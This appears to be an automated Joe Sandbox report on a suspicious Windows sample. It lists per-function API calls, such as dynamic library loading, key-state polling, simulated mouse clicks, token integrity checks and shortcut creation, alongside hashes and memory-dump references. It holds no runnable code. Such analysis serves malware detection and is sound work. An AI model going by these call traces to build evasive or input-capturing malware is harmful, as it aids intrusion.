                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3440857362-0
                                                                                                                            • Opcode ID: 3114d67f689a04e0e5a9ccf517ccd3686e9161edc356020ebc79bae11830590a
                                                                                                                            • Instruction ID: 6394803becc9bf275dbf08b0b0515cc91dfaa9a320eb8c0b7410b2bc7493ab21
                                                                                                                            • Opcode Fuzzy Hash: 3114d67f689a04e0e5a9ccf517ccd3686e9161edc356020ebc79bae11830590a
                                                                                                                            • Instruction Fuzzy Hash: DD517A71608248AFC704EF58DC81E6BB7E8FF85314F14892DF596972A2DB31E904DB52
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F5D927
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F5D9AA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F5D9C6
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F5DA07
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F5DA21
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F47896,?,?,00000000), ref: 00EE5A2C
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F47896,?,?,00000000,?,?), ref: 00EE5A50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 327935632-0
                                                                                                                            • Opcode ID: 4a71accb33b169865e348ac912228ebc0e7225bffb495f38ca48f27376bf8671
                                                                                                                            • Instruction ID: 3d303ff329f83ac72353d394ba567fd7448539a048c2af383af93be8fcea7266
                                                                                                                            • Opcode Fuzzy Hash: 4a71accb33b169865e348ac912228ebc0e7225bffb495f38ca48f27376bf8671
                                                                                                                            • Instruction Fuzzy Hash: 1D514636A01249DFCB10EFA8C4849ADB7F4FF09325B048069E959AB322D731ED49DF90
                                                                                                                            APIs
                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F4E61F
                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F4E648
                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F4E687
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F4E6AC
                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F4E6B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1389676194-0
                                                                                                                            • Opcode ID: 22b21eda25c412c35b4affaa784e14ffab25e0edebb4a84b1998619fe943a8cc
                                                                                                                            • Instruction ID: 9acf010585895ca85aa86f9aee73dd80d9672db473528af5d81f8e26fe66f6c5
                                                                                                                            • Opcode Fuzzy Hash: 22b21eda25c412c35b4affaa784e14ffab25e0edebb4a84b1998619fe943a8cc
                                                                                                                            • Instruction Fuzzy Hash: 0C510735A00249DFCB05EF65C981AAEBBF5EF09314F1480A9E859AB362CB31ED11DF54
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0c25dedeef390e77655ab67e5074994d473147ba5de8c3ede9d3227135748c7e
                                                                                                                            • Instruction ID: 6d82792d466f664f38d3fd62b338a489d2da4efba722f618e0e4ba02e6ba041d
                                                                                                                            • Opcode Fuzzy Hash: 0c25dedeef390e77655ab67e5074994d473147ba5de8c3ede9d3227135748c7e
                                                                                                                            • Instruction Fuzzy Hash: 35418275D04108ABD710DF28DC48FA9BBA8EB0A320F154265E926B72E1CB709D55FE51
                                                                                                                            APIs
                                                                                                                            • GetCursorPos.USER32(?), ref: 00EE2357
                                                                                                                            • ScreenToClient.USER32(00FA57B0,?), ref: 00EE2374
                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00EE2399
                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00EE23A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4210589936-0
                                                                                                                            • Opcode ID: f58b8b8414fef0a169628752a7d0245a5464d3456154e2c9abc4b9fa467b23d0
                                                                                                                            • Instruction ID: 92975408f09490e8ecfe97a5047cb9260bfe7528229ac1431a0a7a51666109ac
                                                                                                                            • Opcode Fuzzy Hash: f58b8b8414fef0a169628752a7d0245a5464d3456154e2c9abc4b9fa467b23d0
                                                                                                                            • Instruction Fuzzy Hash: 3E417135A0410AFBCF159F69CC44AE9BB78FB05364F20431AF929E2290C7359D94EF91
                                                                                                                            APIs
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F363E7
                                                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00F36433
                                                                                                                            • TranslateMessage.USER32(?), ref: 00F3645C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00F36466
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F36475
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2108273632-0
                                                                                                                            • Opcode ID: 7956eb92513c6940705b91c7d57b24657fb0253051bae7ee1abfc00104b5a1f5
                                                                                                                            • Instruction ID: c272aa8eb89cb632cb162d2ef468fa16aa492e081c00ca1f5d0dd78e04d3d1d3
                                                                                                                            • Opcode Fuzzy Hash: 7956eb92513c6940705b91c7d57b24657fb0253051bae7ee1abfc00104b5a1f5
                                                                                                                            • Instruction Fuzzy Hash: 3631B271D0064ABFDB24CFB0DC44BB67BECAB02730F148169E421C71A1E765A899FB60
                                                                                                                            APIs
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00F38A30
                                                                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00F38ADA
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F38AE2
                                                                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00F38AF0
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F38AF8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3382505437-0
                                                                                                                            • Opcode ID: 32ffbb2494be061f4c4355ccaf59016b0210dded14bf618b3d475a81adaccc98
                                                                                                                            • Instruction ID: fff9f63ae5663ebe8984164e8f96b62ede608a357ff9a50dffc7a9ae1d4a5da3
                                                                                                                            • Opcode Fuzzy Hash: 32ffbb2494be061f4c4355ccaf59016b0210dded14bf618b3d475a81adaccc98
                                                                                                                            • Instruction Fuzzy Hash: 2331FF71900219EBCF00CFA8D94CA9E3BB5EB04325F10822AF825E72D1C7B89915EB90
APIs
• IsWindowVisible.USER32(?), ref: 00F3B204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F3B221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F3B259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F3B27F
• _wcsstr.LIBCMT ref: 00F3B289
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: 152d2b12e94d269ec757c4cfe5ec10472f9f839be31364f38b88018d3b71ead3
• Instruction ID: 91d9fd5d5b6d406af05f14ca82b78203694d7fd4240cb71027081857063d92b8
• Opcode Fuzzy Hash: 152d2b12e94d269ec757c4cfe5ec10472f9f839be31364f38b88018d3b71ead3
• Instruction Fuzzy Hash: D621F532604205BAEB169B75DC19E7F7B98DF49730F104229F905DA1A1EFA5DC40B2A0
APIs
  • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
• GetWindowLongW.USER32(?,000000F0), ref: 00F6B192
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F6B1B7
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F6B1CF
• GetSystemMetrics.USER32(00000004), ref: 00F6B1F8
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F50E90,00000000), ref: 00F6B216
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
• Opcode ID: b2940f0a0095afedc6f0a2d492e15ad431558611143bbe31ccff8a2b7e74bcae
• Instruction ID: 5d7bfa39af865a69e5f32b938cb0247b55b7a98b25912d95e4803eed04f3f691
• Opcode Fuzzy Hash: b2940f0a0095afedc6f0a2d492e15ad431558611143bbe31ccff8a2b7e74bcae
• Instruction Fuzzy Hash: 80215C71A10665AFCB119F38DC14A6A3BA4FB06771B154739E932D71E0E73099A0EB90
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F39320
  • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F39352
• __itow.LIBCMT ref: 00F3936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F39392
• __itow.LIBCMT ref: 00F393A3
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
• Opcode ID: 376e7d74a78e26f9ce21f8378a9ecf68d2306312c748df037ff94ddd75f99d42
• Instruction ID: f03374a6d8b75b2c99697c6111176f5fa2191c9471cf981166475a28dfd2d2bc
• Opcode Fuzzy Hash: 376e7d74a78e26f9ce21f8378a9ecf68d2306312c748df037ff94ddd75f99d42
• Instruction Fuzzy Hash: 1F210771B08208ABDB10AAA19C85EAE7BADEF48730F045025F945EB1D0D6F0CD45A7A2
APIs
• IsWindow.USER32(00000000), ref: 00F55A6E
• GetForegroundWindow.USER32 ref: 00F55A85
• GetDC.USER32(00000000), ref: 00F55AC1
• GetPixel.GDI32(00000000,?,00000003), ref: 00F55ACD
• ReleaseDC.USER32(00000000,00000003), ref: 00F55B08
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: f6c1c74afb733aa8d05871d388b6682269f82478997a18f799a6b26e90f88f5e
• Instruction ID: 8784391f0fb75256b684a6ffc76db2d150893ad9598817da48f218dce0a9559e
• Opcode Fuzzy Hash: f6c1c74afb733aa8d05871d388b6682269f82478997a18f799a6b26e90f88f5e
• Instruction Fuzzy Hash: DB21C375A00108AFD704EF65DC94A9ABBE5EF48351F148079FD19D7362CA74AC05EB90
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00EE134D
• SelectObject.GDI32(?,00000000), ref: 00EE135C
• BeginPath.GDI32(?), ref: 00EE1373
• SelectObject.GDI32(?,00000000), ref: 00EE139C
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 03dbcfef238721857787685f93f49769dc552e54eedad8a11c734dc00d356ba9
• Instruction ID: 3ddeaa9b27fe75fbc4b85951d0ffcc437bf82a2fb189d7858094e42daba26470
• Opcode Fuzzy Hash: 03dbcfef238721857787685f93f49769dc552e54eedad8a11c734dc00d356ba9
• Instruction Fuzzy Hash: 482159B080064CEBDB108F26EC047AD7BB8EB11B25F144266E810A65B0D3B498D5EF90
APIs
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 7f83f08317a26c49ea3237e6e3e6fd980fde226f63d8f93617c399e018ab9393
• Instruction ID: 75c729eed606767f71d6972ed25cca9462bf30cdcb3e16735d2fa7926a73dd14
• Opcode Fuzzy Hash: 7f83f08317a26c49ea3237e6e3e6fd980fde226f63d8f93617c399e018ab9393
• Instruction Fuzzy Hash: D001B572B001067BD224AB115D52FBFB35CEE613B8F048021FE0996282EB64DE11B2A2
APIs
• GetCurrentThreadId.KERNEL32 ref: 00F44ABA
• __beginthreadex.LIBCMT ref: 00F44AD8
• MessageBoxW.USER32(?,?,?,?), ref: 00F44AED
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F44B03
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F44B0A
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
• Opcode ID: 062520fac773e0a502a5c7043ef67d0e710bb85b5860d1625db74aa0f369338e
• Instruction ID: 1487b4a93c63490465dd998c20b813c51826f8b00651acea0c1ebc2159d89e0c
• Opcode Fuzzy Hash: 062520fac773e0a502a5c7043ef67d0e710bb85b5860d1625db74aa0f369338e
• Instruction Fuzzy Hash: FD1108B690561CBBC7009FA8EC08B9B7FACEB46320F144265FC24E3250D6B5D904ABA0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F3821E
• GetLastError.KERNEL32(?,00F37CE2,?,?,?), ref: 00F38228
• GetProcessHeap.KERNEL32(00000008,?,?,00F37CE2,?,?,?), ref: 00F38237
• HeapAlloc.KERNEL32(00000000,?,00F37CE2,?,?,?), ref: 00F3823E
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F38255
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
APIs
• CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?,?,00F37455), ref: 00F37127
• ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?), ref: 00F37142
• lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?), ref: 00F37150
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?), ref: 00F37160
• CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?), ref: 00F3716C
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F45260
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F4526E
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F45276
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F45280
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F452BC
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F38121
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F3812B
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F3813A
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F38141
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F38157
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00F3C1F7
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00F3C20E
• MessageBeep.USER32(00000000), ref: 00F3C226
• KillTimer.USER32(?,0000040A), ref: 00F3C242
• EndDialog.USER32(?,00000001), ref: 00F3C25C
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
APIs
• EndPath.GDI32(?), ref: 00EE13BF
• StrokeAndFillPath.GDI32(?,?,00F1B888,00000000,?), ref: 00EE13DB
• SelectObject.GDI32(?,00000000), ref: 00EE13EE
• DeleteObject.GDI32 ref: 00EE1401
• StrokePath.GDI32(?), ref: 00EE141C
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
APIs
• CoInitialize.OLE32(00000000), ref: 00F4C432
• CoCreateInstance.OLE32(00F72D6C,00000000,00000001,00F72BDC,?), ref: 00F4C44A
  • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
• CoUninitialize.OLE32 ref: 00F4C6B7
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_memmove
• String ID: .lnk
• API String ID: 2683427295-24824748
APIs
  • Part of subcall function 00F00DB6: std::exception::exception.LIBCMT ref: 00F00DEC
  • Part of subcall function 00F00DB6: __CxxThrowException@8.LIBCMT ref: 00F00E01
  • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
  • Part of subcall function 00EE7A51: _memmove.LIBCMT ref: 00EE7AAB
• __swprintf.LIBCMT ref: 00EF2ECD
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EF2D66
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
